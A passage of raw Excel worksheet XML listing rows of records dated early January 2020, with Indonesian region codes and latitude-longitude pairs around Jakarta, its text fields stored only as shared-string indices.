      <c r="B85" s="1">
        <v>43831</v>
      </c>
      <c r="C85" s="2">
        <v>0.6849884259259259</v>
      </c>
      <c r="D85" t="s">
        <v>22</v>
      </c>
      <c r="E85" t="s">
        <v>23</v>
      </c>
      <c r="F85" t="s">
        <v>471</v>
      </c>
      <c r="G85" t="s">
        <v>472</v>
      </c>
      <c r="H85" t="s">
        <v>26</v>
      </c>
      <c r="I85" t="s">
        <v>473</v>
      </c>
      <c r="J85" t="s">
        <v>37</v>
      </c>
      <c r="L85" t="s">
        <v>474</v>
      </c>
      <c r="M85">
        <v>3671030005</v>
      </c>
      <c r="N85">
        <v>3671030</v>
      </c>
      <c r="O85">
        <v>3671</v>
      </c>
      <c r="P85">
        <v>36</v>
      </c>
      <c r="Q85" t="s">
        <v>475</v>
      </c>
      <c r="R85" t="s">
        <v>201</v>
      </c>
      <c r="S85" t="s">
        <v>201</v>
      </c>
      <c r="T85" t="s">
        <v>171</v>
      </c>
      <c r="U85" s="5">
        <v>10663035</v>
      </c>
      <c r="V85" s="5" t="s">
        <v>14532</v>
      </c>
      <c r="W85" s="5">
        <v>-619925</v>
      </c>
      <c r="X85" t="s">
        <v>18345</v>
      </c>
      <c r="Y85" t="str">
        <f t="shared" si="1"/>
        <v>-6.19925,106.63035</v>
      </c>
    </row>
    <row r="86" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A86">
        <v>99005</v>
      </c>
      <c r="B86" s="1">
        <v>43831</v>
      </c>
      <c r="C86" s="2">
        <v>0.68751157407407415</v>
      </c>
      <c r="D86" t="s">
        <v>22</v>
      </c>
      <c r="E86" t="s">
        <v>23</v>
      </c>
      <c r="F86" t="s">
        <v>476</v>
      </c>
      <c r="G86" t="s">
        <v>477</v>
      </c>
      <c r="H86" t="s">
        <v>26</v>
      </c>
      <c r="I86" t="s">
        <v>36</v>
      </c>
      <c r="J86" t="s">
        <v>478</v>
      </c>
      <c r="M86">
        <v>3174070001</v>
      </c>
      <c r="N86">
        <v>3174070</v>
      </c>
      <c r="O86">
        <v>3174</v>
      </c>
      <c r="P86">
        <v>31</v>
      </c>
      <c r="Q86" t="s">
        <v>83</v>
      </c>
      <c r="R86" t="s">
        <v>84</v>
      </c>
      <c r="S86" t="s">
        <v>32</v>
      </c>
      <c r="T86" t="s">
        <v>33</v>
      </c>
      <c r="U86" s="5">
        <v>10672097</v>
      </c>
      <c r="V86" s="5" t="s">
        <v>14533</v>
      </c>
      <c r="W86" s="5">
        <v>-616456</v>
      </c>
      <c r="X86" t="s">
        <v>18346</v>
      </c>
      <c r="Y86" t="str">
        <f t="shared" si="1"/>
        <v>-6.16456,106.72097</v>
      </c>
    </row>
    <row r="87" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A87">
        <v>99016</v>
      </c>
      <c r="B87" s="1">
        <v>43831</v>
      </c>
      <c r="C87" s="2">
        <v>0.68837962962962962</v>
      </c>
      <c r="D87" t="s">
        <v>22</v>
      </c>
      <c r="E87" t="s">
        <v>23</v>
      </c>
      <c r="F87" t="s">
        <v>479</v>
      </c>
      <c r="G87" t="s">
        <v>480</v>
      </c>
      <c r="H87" t="s">
        <v>26</v>
      </c>
      <c r="I87" t="s">
        <v>403</v>
      </c>
      <c r="J87" t="s">
        <v>481</v>
      </c>
      <c r="L87" t="s">
        <v>482</v>
      </c>
      <c r="M87">
        <v>3171020005</v>
      </c>
      <c r="N87">
        <v>3171020</v>
      </c>
      <c r="O87">
        <v>3171</v>
      </c>
      <c r="P87">
        <v>31</v>
      </c>
      <c r="Q87" t="s">
        <v>483</v>
      </c>
      <c r="R87" t="s">
        <v>484</v>
      </c>
      <c r="S87" t="s">
        <v>108</v>
      </c>
      <c r="T87" t="s">
        <v>33</v>
      </c>
      <c r="U87" s="5">
        <v>10682946</v>
      </c>
      <c r="V87" s="5" t="s">
        <v>14534</v>
      </c>
      <c r="W87" s="5">
        <v>-629501</v>
      </c>
      <c r="X87" t="s">
        <v>18347</v>
      </c>
      <c r="Y87" t="str">
        <f t="shared" si="1"/>
        <v>-6.29501,106.82946</v>
      </c>
    </row>
    <row r="88" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A88">
        <v>99077</v>
      </c>
      <c r="B88" s="1">
        <v>43831</v>
      </c>
      <c r="C88" s="2">
        <v>0.69832175925925932</v>
      </c>
      <c r="D88" t="s">
        <v>22</v>
      </c>
      <c r="E88" t="s">
        <v>23</v>
      </c>
      <c r="F88" t="s">
        <v>485</v>
      </c>
      <c r="G88" t="s">
        <v>486</v>
      </c>
      <c r="H88" t="s">
        <v>26</v>
      </c>
      <c r="I88" t="s">
        <v>487</v>
      </c>
      <c r="J88" t="s">
        <v>37</v>
      </c>
      <c r="L88" t="s">
        <v>488</v>
      </c>
      <c r="M88">
        <v>3216023007</v>
      </c>
      <c r="N88">
        <v>3216023</v>
      </c>
      <c r="O88">
        <v>3216</v>
      </c>
      <c r="P88">
        <v>32</v>
      </c>
      <c r="Q88" t="s">
        <v>489</v>
      </c>
      <c r="R88" t="s">
        <v>490</v>
      </c>
      <c r="S88" t="s">
        <v>41</v>
      </c>
      <c r="T88" t="s">
        <v>42</v>
      </c>
      <c r="U88" s="5">
        <v>10716339</v>
      </c>
      <c r="V88" s="5" t="s">
        <v>14535</v>
      </c>
      <c r="W88" s="5">
        <v>-631031</v>
      </c>
      <c r="X88" t="s">
        <v>18348</v>
      </c>
      <c r="Y88" t="str">
        <f t="shared" si="1"/>
        <v>-6.31031,107.16339</v>
      </c>
    </row>
    <row r="89" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A89">
        <v>99086</v>
      </c>
      <c r="B89" s="1">
        <v>43831</v>
      </c>
      <c r="C89" s="2">
        <v>0.69972222222222225</v>
      </c>
      <c r="D89" t="s">
        <v>22</v>
      </c>
      <c r="E89" t="s">
        <v>23</v>
      </c>
      <c r="F89" t="s">
        <v>491</v>
      </c>
      <c r="H89" t="s">
        <v>26</v>
      </c>
      <c r="I89" t="s">
        <v>492</v>
      </c>
      <c r="J89" t="s">
        <v>37</v>
      </c>
      <c r="L89" t="s">
        <v>493</v>
      </c>
      <c r="M89">
        <v>3275061001</v>
      </c>
      <c r="N89">
        <v>3275061</v>
      </c>
      <c r="O89">
        <v>3275</v>
      </c>
      <c r="P89">
        <v>32</v>
      </c>
      <c r="Q89" t="s">
        <v>494</v>
      </c>
      <c r="R89" t="s">
        <v>40</v>
      </c>
      <c r="S89" t="s">
        <v>41</v>
      </c>
      <c r="T89" t="s">
        <v>42</v>
      </c>
      <c r="U89" s="5">
        <v>10698724</v>
      </c>
      <c r="V89" s="5" t="s">
        <v>14536</v>
      </c>
      <c r="W89" s="5">
        <v>-622667</v>
      </c>
      <c r="X89" t="s">
        <v>18349</v>
      </c>
      <c r="Y89" t="str">
        <f t="shared" si="1"/>
        <v>-6.22667,106.98724</v>
      </c>
    </row>
    <row r="90" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A90">
        <v>99173</v>
      </c>
      <c r="B90" s="1">
        <v>43831</v>
      </c>
      <c r="C90" s="2">
        <v>0.7134490740740741</v>
      </c>
      <c r="D90" t="s">
        <v>22</v>
      </c>
      <c r="E90" t="s">
        <v>23</v>
      </c>
      <c r="F90" t="s">
        <v>495</v>
      </c>
      <c r="G90" t="s">
        <v>496</v>
      </c>
      <c r="H90" t="s">
        <v>26</v>
      </c>
      <c r="I90" t="s">
        <v>497</v>
      </c>
      <c r="J90" t="s">
        <v>498</v>
      </c>
      <c r="M90">
        <v>3171020006</v>
      </c>
      <c r="N90">
        <v>3171020</v>
      </c>
      <c r="O90">
        <v>3171</v>
      </c>
      <c r="P90">
        <v>31</v>
      </c>
      <c r="Q90" t="s">
        <v>499</v>
      </c>
      <c r="R90" t="s">
        <v>484</v>
      </c>
      <c r="S90" t="s">
        <v>108</v>
      </c>
      <c r="T90" t="s">
        <v>33</v>
      </c>
      <c r="U90" s="5">
        <v>10683496</v>
      </c>
      <c r="V90" s="5" t="s">
        <v>14537</v>
      </c>
      <c r="W90" s="5">
        <v>-626968</v>
      </c>
      <c r="X90" t="s">
        <v>18350</v>
      </c>
      <c r="Y90" t="str">
        <f t="shared" si="1"/>
        <v>-6.26968,106.83496</v>
      </c>
    </row>
    <row r="91" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A91">
        <v>99229</v>
      </c>
      <c r="B91" s="1">
        <v>43831</v>
      </c>
      <c r="C91" s="2">
        <v>0.74304398148148154</v>
      </c>
      <c r="D91" t="s">
        <v>22</v>
      </c>
      <c r="E91" t="s">
        <v>23</v>
      </c>
      <c r="F91" t="s">
        <v>500</v>
      </c>
      <c r="G91" t="s">
        <v>501</v>
      </c>
      <c r="H91" t="s">
        <v>26</v>
      </c>
      <c r="I91" t="s">
        <v>124</v>
      </c>
      <c r="J91" t="s">
        <v>37</v>
      </c>
      <c r="L91" t="s">
        <v>502</v>
      </c>
      <c r="M91">
        <v>3201190010</v>
      </c>
      <c r="N91">
        <v>3201190</v>
      </c>
      <c r="O91">
        <v>3201</v>
      </c>
      <c r="P91">
        <v>32</v>
      </c>
      <c r="Q91" t="s">
        <v>419</v>
      </c>
      <c r="R91" t="s">
        <v>420</v>
      </c>
      <c r="S91" t="s">
        <v>421</v>
      </c>
      <c r="T91" t="s">
        <v>42</v>
      </c>
      <c r="U91" s="5">
        <v>10696756</v>
      </c>
      <c r="V91" s="5" t="s">
        <v>14538</v>
      </c>
      <c r="W91" s="5">
        <v>-630571</v>
      </c>
      <c r="X91" t="s">
        <v>18351</v>
      </c>
      <c r="Y91" t="str">
        <f t="shared" si="1"/>
        <v>-6.30571,106.96756</v>
      </c>
    </row>
    <row r="92" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A92">
        <v>99230</v>
      </c>
      <c r="B92" s="1">
        <v>43831</v>
      </c>
      <c r="C92" s="2">
        <v>0.75563657407407403</v>
      </c>
      <c r="D92" t="s">
        <v>22</v>
      </c>
      <c r="E92" t="s">
        <v>23</v>
      </c>
      <c r="F92" t="s">
        <v>503</v>
      </c>
      <c r="G92" t="s">
        <v>504</v>
      </c>
      <c r="H92" t="s">
        <v>26</v>
      </c>
      <c r="I92" t="s">
        <v>424</v>
      </c>
      <c r="J92" t="s">
        <v>505</v>
      </c>
      <c r="L92" t="s">
        <v>506</v>
      </c>
      <c r="M92">
        <v>3171050001</v>
      </c>
      <c r="N92">
        <v>3171050</v>
      </c>
      <c r="O92">
        <v>3171</v>
      </c>
      <c r="P92">
        <v>31</v>
      </c>
      <c r="Q92" t="s">
        <v>507</v>
      </c>
      <c r="R92" t="s">
        <v>508</v>
      </c>
      <c r="S92" t="s">
        <v>108</v>
      </c>
      <c r="T92" t="s">
        <v>33</v>
      </c>
      <c r="U92" s="5">
        <v>10677001</v>
      </c>
      <c r="V92" s="5" t="s">
        <v>14539</v>
      </c>
      <c r="W92" s="5">
        <v>-626655</v>
      </c>
      <c r="X92" t="s">
        <v>18352</v>
      </c>
      <c r="Y92" t="str">
        <f t="shared" si="1"/>
        <v>-6.26655,106.77001</v>
      </c>
    </row>
    <row r="93" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A93">
        <v>99231</v>
      </c>
      <c r="B93" s="1">
        <v>43831</v>
      </c>
      <c r="C93" s="2">
        <v>0.79422453703703699</v>
      </c>
      <c r="D93" t="s">
        <v>22</v>
      </c>
      <c r="E93" t="s">
        <v>23</v>
      </c>
      <c r="F93" t="s">
        <v>509</v>
      </c>
      <c r="G93" t="s">
        <v>510</v>
      </c>
      <c r="H93" t="s">
        <v>26</v>
      </c>
      <c r="I93" t="s">
        <v>511</v>
      </c>
      <c r="J93" t="s">
        <v>512</v>
      </c>
      <c r="L93" t="s">
        <v>513</v>
      </c>
      <c r="M93">
        <v>3174010002</v>
      </c>
      <c r="N93">
        <v>3174010</v>
      </c>
      <c r="O93">
        <v>3174</v>
      </c>
      <c r="P93">
        <v>31</v>
      </c>
      <c r="Q93" t="s">
        <v>514</v>
      </c>
      <c r="R93" t="s">
        <v>69</v>
      </c>
      <c r="S93" t="s">
        <v>32</v>
      </c>
      <c r="T93" t="s">
        <v>33</v>
      </c>
      <c r="U93" s="5">
        <v>10676472</v>
      </c>
      <c r="V93" s="5" t="s">
        <v>14540</v>
      </c>
      <c r="W93" s="5">
        <v>-620862</v>
      </c>
      <c r="X93" t="s">
        <v>18353</v>
      </c>
      <c r="Y93" t="str">
        <f t="shared" si="1"/>
        <v>-6.20862,106.76472</v>
      </c>
    </row>
    <row r="94" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A94">
        <v>99232</v>
      </c>
      <c r="B94" s="1">
        <v>43831</v>
      </c>
      <c r="C94" s="2">
        <v>0.79831018518518515</v>
      </c>
      <c r="D94" t="s">
        <v>22</v>
      </c>
      <c r="E94" t="s">
        <v>23</v>
      </c>
      <c r="F94" t="s">
        <v>515</v>
      </c>
      <c r="G94" t="s">
        <v>516</v>
      </c>
      <c r="H94" t="s">
        <v>26</v>
      </c>
      <c r="I94" t="s">
        <v>517</v>
      </c>
      <c r="J94" t="s">
        <v>518</v>
      </c>
      <c r="L94" t="s">
        <v>519</v>
      </c>
      <c r="M94">
        <v>3173070003</v>
      </c>
      <c r="N94">
        <v>3173070</v>
      </c>
      <c r="O94">
        <v>3173</v>
      </c>
      <c r="P94">
        <v>31</v>
      </c>
      <c r="Q94" t="s">
        <v>520</v>
      </c>
      <c r="R94" t="s">
        <v>323</v>
      </c>
      <c r="S94" t="s">
        <v>62</v>
      </c>
      <c r="T94" t="s">
        <v>33</v>
      </c>
      <c r="U94" s="5">
        <v>10683639</v>
      </c>
      <c r="V94" s="5" t="s">
        <v>14541</v>
      </c>
      <c r="W94" s="5">
        <v>-615691</v>
      </c>
      <c r="X94" t="s">
        <v>18354</v>
      </c>
      <c r="Y94" t="str">
        <f t="shared" si="1"/>
        <v>-6.15691,106.83639</v>
      </c>
    </row>
    <row r="95" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A95">
        <v>99233</v>
      </c>
      <c r="B95" s="1">
        <v>43831</v>
      </c>
      <c r="C95" s="2">
        <v>0.79915509259259254</v>
      </c>
      <c r="D95" t="s">
        <v>22</v>
      </c>
      <c r="E95" t="s">
        <v>23</v>
      </c>
      <c r="F95" t="s">
        <v>521</v>
      </c>
      <c r="G95" t="s">
        <v>522</v>
      </c>
      <c r="H95" t="s">
        <v>26</v>
      </c>
      <c r="I95" t="s">
        <v>523</v>
      </c>
      <c r="J95" t="s">
        <v>524</v>
      </c>
      <c r="L95" t="s">
        <v>525</v>
      </c>
      <c r="M95">
        <v>3173070004</v>
      </c>
      <c r="N95">
        <v>3173070</v>
      </c>
      <c r="O95">
        <v>3173</v>
      </c>
      <c r="P95">
        <v>31</v>
      </c>
      <c r="Q95" t="s">
        <v>526</v>
      </c>
      <c r="R95" t="s">
        <v>323</v>
      </c>
      <c r="S95" t="s">
        <v>62</v>
      </c>
      <c r="T95" t="s">
        <v>33</v>
      </c>
      <c r="U95" s="5">
        <v>10683152</v>
      </c>
      <c r="V95" s="5" t="s">
        <v>14542</v>
      </c>
      <c r="W95" s="5">
        <v>-615854</v>
      </c>
      <c r="X95" t="s">
        <v>18355</v>
      </c>
      <c r="Y95" t="str">
        <f t="shared" si="1"/>
        <v>-6.15854,106.83152</v>
      </c>
    </row>
    <row r="96" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A96">
        <v>99234</v>
      </c>
      <c r="B96" s="1">
        <v>43831</v>
      </c>
      <c r="C96" s="2">
        <v>0.85689814814814813</v>
      </c>
      <c r="D96" t="s">
        <v>22</v>
      </c>
      <c r="E96" t="s">
        <v>23</v>
      </c>
      <c r="F96" t="s">
        <v>527</v>
      </c>
      <c r="G96" t="s">
        <v>528</v>
      </c>
      <c r="H96" t="s">
        <v>26</v>
      </c>
      <c r="I96" t="s">
        <v>529</v>
      </c>
      <c r="J96" t="s">
        <v>530</v>
      </c>
      <c r="L96" t="s">
        <v>531</v>
      </c>
      <c r="M96">
        <v>3174010005</v>
      </c>
      <c r="N96">
        <v>3174010</v>
      </c>
      <c r="O96">
        <v>3174</v>
      </c>
      <c r="P96">
        <v>31</v>
      </c>
      <c r="Q96" t="s">
        <v>251</v>
      </c>
      <c r="R96" t="s">
        <v>69</v>
      </c>
      <c r="S96" t="s">
        <v>32</v>
      </c>
      <c r="T96" t="s">
        <v>33</v>
      </c>
      <c r="U96" s="5">
        <v>10675816</v>
      </c>
      <c r="V96" s="5" t="s">
        <v>14543</v>
      </c>
      <c r="W96" s="5">
        <v>-618720</v>
      </c>
      <c r="X96" t="s">
        <v>18356</v>
      </c>
      <c r="Y96" t="str">
        <f t="shared" si="1"/>
        <v>-6.18720,106.75816</v>
      </c>
    </row>
    <row r="97" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A97">
        <v>99235</v>
      </c>
      <c r="B97" s="1">
        <v>43831</v>
      </c>
      <c r="C97" s="2">
        <v>0.95901620370370377</v>
      </c>
      <c r="D97" t="s">
        <v>22</v>
      </c>
      <c r="E97" t="s">
        <v>23</v>
      </c>
      <c r="F97" t="s">
        <v>532</v>
      </c>
      <c r="G97" t="s">
        <v>533</v>
      </c>
      <c r="H97" t="s">
        <v>26</v>
      </c>
      <c r="I97" t="s">
        <v>534</v>
      </c>
      <c r="J97" t="s">
        <v>404</v>
      </c>
      <c r="L97" t="s">
        <v>535</v>
      </c>
      <c r="M97">
        <v>3174020005</v>
      </c>
      <c r="N97">
        <v>3174020</v>
      </c>
      <c r="O97">
        <v>3174</v>
      </c>
      <c r="P97">
        <v>31</v>
      </c>
      <c r="Q97" t="s">
        <v>30</v>
      </c>
      <c r="R97" t="s">
        <v>31</v>
      </c>
      <c r="S97" t="s">
        <v>32</v>
      </c>
      <c r="T97" t="s">
        <v>33</v>
      </c>
      <c r="U97" s="5">
        <v>10677038</v>
      </c>
      <c r="V97" s="5" t="s">
        <v>14544</v>
      </c>
      <c r="W97" s="5">
        <v>-616827</v>
      </c>
      <c r="X97" t="s">
        <v>18357</v>
      </c>
      <c r="Y97" t="str">
        <f t="shared" si="1"/>
        <v>-6.16827,106.77038</v>
      </c>
    </row>
    <row r="98" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A98">
        <v>99236</v>
      </c>
      <c r="B98" s="1">
        <v>43831</v>
      </c>
      <c r="C98" s="2">
        <v>0.96333333333333337</v>
      </c>
      <c r="D98" t="s">
        <v>22</v>
      </c>
      <c r="E98" t="s">
        <v>23</v>
      </c>
      <c r="F98" t="s">
        <v>536</v>
      </c>
      <c r="G98" t="s">
        <v>537</v>
      </c>
      <c r="H98" t="s">
        <v>26</v>
      </c>
      <c r="I98" t="s">
        <v>166</v>
      </c>
      <c r="J98" t="s">
        <v>37</v>
      </c>
      <c r="L98" t="s">
        <v>538</v>
      </c>
      <c r="M98">
        <v>3674060011</v>
      </c>
      <c r="N98">
        <v>3674060</v>
      </c>
      <c r="O98">
        <v>3674</v>
      </c>
      <c r="P98">
        <v>36</v>
      </c>
      <c r="Q98" t="s">
        <v>539</v>
      </c>
      <c r="R98" t="s">
        <v>169</v>
      </c>
      <c r="S98" t="s">
        <v>170</v>
      </c>
      <c r="T98" t="s">
        <v>171</v>
      </c>
      <c r="U98" s="5">
        <v>10675244</v>
      </c>
      <c r="V98" s="5" t="s">
        <v>14545</v>
      </c>
      <c r="W98" s="5">
        <v>-626652</v>
      </c>
      <c r="X98" t="s">
        <v>18358</v>
      </c>
      <c r="Y98" t="str">
        <f t="shared" si="1"/>
        <v>-6.26652,106.75244</v>
      </c>
    </row>
    <row r="99" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A99">
        <v>99237</v>
      </c>
      <c r="B99" s="1">
        <v>43831</v>
      </c>
      <c r="C99" s="2">
        <v>0.96414351851851843</v>
      </c>
      <c r="D99" t="s">
        <v>22</v>
      </c>
      <c r="E99" t="s">
        <v>23</v>
      </c>
      <c r="F99" t="s">
        <v>540</v>
      </c>
      <c r="G99" t="s">
        <v>541</v>
      </c>
      <c r="H99" t="s">
        <v>26</v>
      </c>
      <c r="I99" t="s">
        <v>542</v>
      </c>
      <c r="J99" t="s">
        <v>543</v>
      </c>
      <c r="L99" t="s">
        <v>544</v>
      </c>
      <c r="M99">
        <v>3175010003</v>
      </c>
      <c r="N99">
        <v>3175010</v>
      </c>
      <c r="O99">
        <v>3175</v>
      </c>
      <c r="P99">
        <v>31</v>
      </c>
      <c r="Q99" t="s">
        <v>545</v>
      </c>
      <c r="R99" t="s">
        <v>546</v>
      </c>
      <c r="S99" t="s">
        <v>547</v>
      </c>
      <c r="T99" t="s">
        <v>33</v>
      </c>
      <c r="U99" s="5">
        <v>10678084</v>
      </c>
      <c r="V99" s="5" t="s">
        <v>14546</v>
      </c>
      <c r="W99" s="5">
        <v>-613803</v>
      </c>
      <c r="X99" t="s">
        <v>18359</v>
      </c>
      <c r="Y99" t="str">
        <f t="shared" si="1"/>
        <v>-6.13803,106.78084</v>
      </c>
    </row>
    <row r="100" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A100">
        <v>99238</v>
      </c>
      <c r="B100" s="1">
        <v>43831</v>
      </c>
      <c r="C100" s="2">
        <v>0.99241898148148155</v>
      </c>
      <c r="D100" t="s">
        <v>22</v>
      </c>
      <c r="E100" t="s">
        <v>23</v>
      </c>
      <c r="F100" s="3" t="s">
        <v>548</v>
      </c>
      <c r="H100" t="s">
        <v>26</v>
      </c>
      <c r="I100" t="s">
        <v>549</v>
      </c>
      <c r="J100" t="s">
        <v>550</v>
      </c>
      <c r="L100" t="s">
        <v>551</v>
      </c>
      <c r="M100">
        <v>3172040003</v>
      </c>
      <c r="N100">
        <v>3172040</v>
      </c>
      <c r="O100">
        <v>3172</v>
      </c>
      <c r="P100">
        <v>31</v>
      </c>
      <c r="Q100" t="s">
        <v>552</v>
      </c>
      <c r="R100" t="s">
        <v>281</v>
      </c>
      <c r="S100" t="s">
        <v>49</v>
      </c>
      <c r="T100" t="s">
        <v>33</v>
      </c>
      <c r="U100" s="5">
        <v>10687852</v>
      </c>
      <c r="V100" s="5" t="s">
        <v>14547</v>
      </c>
      <c r="W100" s="5">
        <v>-624717</v>
      </c>
      <c r="X100" t="s">
        <v>18360</v>
      </c>
      <c r="Y100" t="str">
        <f t="shared" si="1"/>
        <v>-6.24717,106.87852</v>
      </c>
    </row>
    <row r="101" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A101">
        <v>100015</v>
      </c>
      <c r="B101" s="1">
        <v>43832</v>
      </c>
      <c r="C101" s="2">
        <v>0.19687499999999999</v>
      </c>
      <c r="D101" t="s">
        <v>22</v>
      </c>
      <c r="E101" t="s">
        <v>23</v>
      </c>
      <c r="F101" t="s">
        <v>553</v>
      </c>
      <c r="G101" t="s">
        <v>554</v>
      </c>
      <c r="H101" t="s">
        <v>26</v>
      </c>
      <c r="I101" t="s">
        <v>555</v>
      </c>
      <c r="J101" t="s">
        <v>512</v>
      </c>
      <c r="L101" t="s">
        <v>556</v>
      </c>
      <c r="M101">
        <v>3174010002</v>
      </c>
      <c r="N101">
        <v>3174010</v>
      </c>
      <c r="O101">
        <v>3174</v>
      </c>
      <c r="P101">
        <v>31</v>
      </c>
      <c r="Q101" t="s">
        <v>514</v>
      </c>
      <c r="R101" t="s">
        <v>69</v>
      </c>
      <c r="S101" t="s">
        <v>32</v>
      </c>
      <c r="T101" t="s">
        <v>33</v>
      </c>
      <c r="U101" s="5">
        <v>10676469</v>
      </c>
      <c r="V101" s="5" t="s">
        <v>14548</v>
      </c>
      <c r="W101" s="5">
        <v>-620854</v>
      </c>
      <c r="X101" t="s">
        <v>18361</v>
      </c>
      <c r="Y101" t="str">
        <f t="shared" si="1"/>
        <v>-6.20854,106.76469</v>
      </c>
    </row>
    <row r="102" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A102">
        <v>100056</v>
      </c>
      <c r="B102" s="1">
        <v>43832</v>
      </c>
      <c r="C102" s="2">
        <v>0.19878472222222221</v>
      </c>
      <c r="D102" t="s">
        <v>22</v>
      </c>
      <c r="E102" t="s">
        <v>23</v>
      </c>
      <c r="F102" t="s">
        <v>557</v>
      </c>
      <c r="H102" t="s">
        <v>26</v>
      </c>
      <c r="I102" t="s">
        <v>290</v>
      </c>
      <c r="J102" t="s">
        <v>558</v>
      </c>
      <c r="L102" t="s">
        <v>559</v>
      </c>
      <c r="M102">
        <v>3171040001</v>
      </c>
      <c r="N102">
        <v>3171040</v>
      </c>
      <c r="O102">
        <v>3171</v>
      </c>
      <c r="P102">
        <v>31</v>
      </c>
      <c r="Q102" t="s">
        <v>162</v>
      </c>
      <c r="R102" t="s">
        <v>163</v>
      </c>
      <c r="S102" t="s">
        <v>108</v>
      </c>
      <c r="T102" t="s">
        <v>33</v>
      </c>
      <c r="U102" s="5">
        <v>10676359</v>
      </c>
      <c r="V102" s="5" t="s">
        <v>14549</v>
      </c>
      <c r="W102" s="5">
        <v>-627878</v>
      </c>
      <c r="X102" t="s">
        <v>18362</v>
      </c>
      <c r="Y102" t="str">
        <f t="shared" si="1"/>
        <v>-6.27878,106.76359</v>
      </c>
    </row>
    <row r="103" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A103">
        <v>100087</v>
      </c>
      <c r="B103" s="1">
        <v>43832</v>
      </c>
      <c r="C103" s="2">
        <v>0.19909722222222223</v>
      </c>
      <c r="D103" t="s">
        <v>22</v>
      </c>
      <c r="E103" t="s">
        <v>23</v>
      </c>
      <c r="F103" t="s">
        <v>560</v>
      </c>
      <c r="G103" t="s">
        <v>561</v>
      </c>
      <c r="H103" t="s">
        <v>26</v>
      </c>
      <c r="I103" t="s">
        <v>562</v>
      </c>
      <c r="J103" t="s">
        <v>563</v>
      </c>
      <c r="L103" t="s">
        <v>564</v>
      </c>
      <c r="M103">
        <v>3174010005</v>
      </c>
      <c r="N103">
        <v>3174010</v>
      </c>
      <c r="O103">
        <v>3174</v>
      </c>
      <c r="P103">
        <v>31</v>
      </c>
      <c r="Q103" t="s">
        <v>251</v>
      </c>
      <c r="R103" t="s">
        <v>69</v>
      </c>
      <c r="S103" t="s">
        <v>32</v>
      </c>
      <c r="T103" t="s">
        <v>33</v>
      </c>
      <c r="U103" s="5">
        <v>10675578</v>
      </c>
      <c r="V103" s="5" t="s">
        <v>14550</v>
      </c>
      <c r="W103" s="5">
        <v>-618806</v>
      </c>
      <c r="X103" t="s">
        <v>18363</v>
      </c>
      <c r="Y103" t="str">
        <f t="shared" si="1"/>
        <v>-6.18806,106.75578</v>
      </c>
    </row>
    <row r="104" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A104">
        <v>100197</v>
      </c>
      <c r="B104" s="1">
        <v>43832</v>
      </c>
      <c r="C104" s="2">
        <v>0.21967592592592591</v>
      </c>
      <c r="D104" t="s">
        <v>22</v>
      </c>
      <c r="E104" t="s">
        <v>23</v>
      </c>
      <c r="F104" t="s">
        <v>565</v>
      </c>
      <c r="H104" t="s">
        <v>26</v>
      </c>
      <c r="I104" t="s">
        <v>166</v>
      </c>
      <c r="J104" t="s">
        <v>566</v>
      </c>
      <c r="L104" t="s">
        <v>567</v>
      </c>
      <c r="M104">
        <v>3174070005</v>
      </c>
      <c r="N104">
        <v>3174070</v>
      </c>
      <c r="O104">
        <v>3174</v>
      </c>
      <c r="P104">
        <v>31</v>
      </c>
      <c r="Q104" t="s">
        <v>568</v>
      </c>
      <c r="R104" t="s">
        <v>84</v>
      </c>
      <c r="S104" t="s">
        <v>32</v>
      </c>
      <c r="T104" t="s">
        <v>33</v>
      </c>
      <c r="U104" s="5">
        <v>10673306</v>
      </c>
      <c r="V104" s="5" t="s">
        <v>14551</v>
      </c>
      <c r="W104" s="5">
        <v>-613735</v>
      </c>
      <c r="X104" t="s">
        <v>18364</v>
      </c>
      <c r="Y104" t="str">
        <f t="shared" si="1"/>
        <v>-6.13735,106.73306</v>
      </c>
    </row>
    <row r="105" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A105">
        <v>100219</v>
      </c>
      <c r="B105" s="1">
        <v>43832</v>
      </c>
      <c r="C105" s="2">
        <v>0.23253472222222224</v>
      </c>
      <c r="D105" t="s">
        <v>22</v>
      </c>
      <c r="E105" t="s">
        <v>23</v>
      </c>
      <c r="F105" t="s">
        <v>569</v>
      </c>
      <c r="G105" t="s">
        <v>570</v>
      </c>
      <c r="H105" t="s">
        <v>26</v>
      </c>
      <c r="I105" t="s">
        <v>571</v>
      </c>
      <c r="J105" t="s">
        <v>37</v>
      </c>
      <c r="L105" t="s">
        <v>572</v>
      </c>
      <c r="M105">
        <v>3275031002</v>
      </c>
      <c r="N105">
        <v>3275031</v>
      </c>
      <c r="O105">
        <v>3275</v>
      </c>
      <c r="P105">
        <v>32</v>
      </c>
      <c r="Q105" t="s">
        <v>573</v>
      </c>
      <c r="R105" t="s">
        <v>574</v>
      </c>
      <c r="S105" t="s">
        <v>41</v>
      </c>
      <c r="T105" t="s">
        <v>42</v>
      </c>
      <c r="U105" s="5">
        <v>10702868</v>
      </c>
      <c r="V105" s="5" t="s">
        <v>14552</v>
      </c>
      <c r="W105" s="5">
        <v>-632592</v>
      </c>
      <c r="X105" t="s">
        <v>18365</v>
      </c>
      <c r="Y105" t="str">
        <f t="shared" si="1"/>
        <v>-6.32592,107.02868</v>
      </c>
    </row>
    <row r="106" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A106">
        <v>100226</v>
      </c>
      <c r="B106" s="1">
        <v>43832</v>
      </c>
      <c r="C106" s="2">
        <v>0.2356365740740741</v>
      </c>
      <c r="D106" t="s">
        <v>22</v>
      </c>
      <c r="E106" t="s">
        <v>23</v>
      </c>
      <c r="F106" t="s">
        <v>575</v>
      </c>
      <c r="G106" t="s">
